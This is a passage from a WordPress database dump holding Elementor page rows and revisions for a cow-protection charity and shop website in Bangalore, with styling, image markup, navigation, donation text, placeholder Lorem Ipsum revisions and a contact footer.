10:09:39','2022-09-21 04:39:39','','Elementor #1371','','inherit','closed','closed','','1371-revision-v1','','','2022-09-21 10:09:39','2022-09-21 04:39:39','',1371,'https://gopalak.in/?p=1372',0,'revision','',0),(1373,1,'2022-09-21 10:12:58','2022-09-21 04:42:58','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n																<a href=\"https://gopalak.in\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by <a href=\"https://themehunk.com/\" target=\"_blank\" rel=\"noopener\">Themehunk</a></p>','Home','','publish','closed','closed','','homepage','','','2022-10-28 12:41:57','2022-10-28 07:11:57','',0,'https://gopalak.in/?page_id=1373',0,'page','',0),(1374,1,'2022-09-21 10:12:09','2022-09-21 04:42:09','','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 10:12:09','2022-09-21 04:42:09','',1373,'https://gopalak.in/?p=1374',0,'revision','',0),(1375,1,'2022-09-21 10:13:41','2022-09-21 04:43:41','','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 10:13:41','2022-09-21 04:43:41','',1373,'https://gopalak.in/?p=1375',0,'revision','',0),(1376,1,'2022-09-21 10:13:41','2022-09-21 04:43:41','','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 10:13:41','2022-09-21 04:43:41','',1373,'https://gopalak.in/?p=1376',0,'revision','',0),(1377,1,'2022-09-21 10:13:41','2022-09-21 04:43:41','<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 10:13:41','2022-09-21 04:43:41','',1373,'https://gopalak.in/?p=1377',0,'revision','',0),(1380,1,'2022-09-21 10:35:13','2022-09-21 05:05:13','<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 10:35:13','2022-09-21 05:05:13','',1373,'https://gopalak.in/?p=1380',0,'revision','',0),(1381,1,'2022-09-21 10:35:13','2022-09-21 05:05:13','<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 10:35:13','2022-09-21 05:05:13','',1373,'https://gopalak.in/?p=1381',0,'revision','',0),(1382,1,'2022-09-21 10:35:13','2022-09-21 05:05:13','<style>/*! elementor - v3.7.6 - 15-09-2022 */\nbody.elementor-page .elementor-widget-menu-anchor{margin-bottom:0}</style>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 10:35:13','2022-09-21 05:05:13','',1373,'https://gopalak.in/?p=1382',0,'revision','',0),(1384,1,'2022-09-21 10:36:57','2022-09-21 05:06:57','<style>/*! elementor - v3.7.6 - 15-09-2022 */\nbody.elementor-page .elementor-widget-menu-anchor{margin-bottom:0}</style>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			